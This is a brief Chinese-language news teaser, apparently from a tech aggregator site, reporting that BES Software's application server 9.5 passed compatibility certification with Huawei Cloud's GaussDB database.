    摘要:北京寶蘭德軟體股份有限公司攜手華為云完成寶蘭德應用服務器軟體9.5與GaussDB資料庫兼容性測驗,并獲得華為云授予的技術認證書。 本文分享自華為云社區《寶蘭德應用服務器軟體與華為云GaussDB完成兼容互認證》,作者:GaussDB 資料庫。 近日,北京寶蘭德軟體股份有限公司(簡稱:寶蘭德) ......

    uj5u.com 2023-05-16 12:05:43 more